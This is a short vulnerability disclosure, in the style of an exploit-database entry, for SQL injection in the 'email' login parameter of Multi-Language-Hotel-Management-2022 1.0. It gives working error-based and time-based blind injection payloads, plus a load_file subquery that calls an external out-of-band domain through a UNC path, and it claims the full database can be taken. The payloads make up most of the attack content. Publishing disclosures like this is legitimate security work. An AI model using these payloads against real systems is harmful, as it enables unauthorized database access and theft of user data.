## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi ## Author: nu11secur1ty ## Date: 08.03.2022 ## Vendor: https://www.nikhilbhalerao.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022 ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can easily get the all database from this hotel system and can do very malicious stuff with the users who are inside of this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: email (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=hmqHtDjH@burpcollaborator.net'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=m5S!k0l!S6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=hmqHtDjH@burpcollaborator.net'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM (SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022) ## Proof and Exploit: [href](https://streamable.com/uk7zq2)